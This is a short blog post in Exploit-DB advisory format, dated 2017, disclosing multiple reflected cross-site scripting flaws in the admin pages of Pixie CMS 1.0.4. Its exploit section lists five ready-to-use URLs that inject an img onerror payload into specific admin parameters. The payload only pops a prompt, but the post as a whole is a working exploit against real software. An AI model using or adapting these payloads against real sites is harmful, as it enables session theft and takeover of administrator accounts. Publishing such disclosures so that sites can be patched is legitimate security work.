Jumat, 31 Maret 2017

Multiple XSS Vulnerability on Pixie 1.0.4

# Exploit Title: Multiple XSS Vulnerability on Pixie 1.0.4
# Google Dork: no
# Date: 29-03-2017
# Exploit Author: @rungga_reksya, @dickysofficial
# Vendor Homepage: http://www.getpixie.co.uk
# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip
# Version: 1.0.4
# Tested on: Windows Server 2012 Datacenter Evaluation


I. Background:
Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker.

II. Description:
XSS Vulnerability on Pixie 1.0.4

We found Multiple XSS on admin folder perimeters:

s=login&m=
s=settings&x=
s=publish&m=static&x=
s=publish&m=dynamic&x=
s=publish&m=module&x=


III. Exploit:

 
- http://ip_address/folder_pixie_v1.04/admin/?s=login&m="><img src=x onerror=prompt(/PAYLOADXSS/)> or http://ip_address/folder_pixie_v1.04/admin/index.php?s=login&m="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=settings&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=static&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=dynamic&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=module&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


IV. Thanks to:
- Alloh SWT
- https://packetstormsecurity.com/files/126870/Pixie-CMS-1.04-Cross-Site-Scripting.html
- MyBoboboy
- @dickysofficial
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org

0 komentar: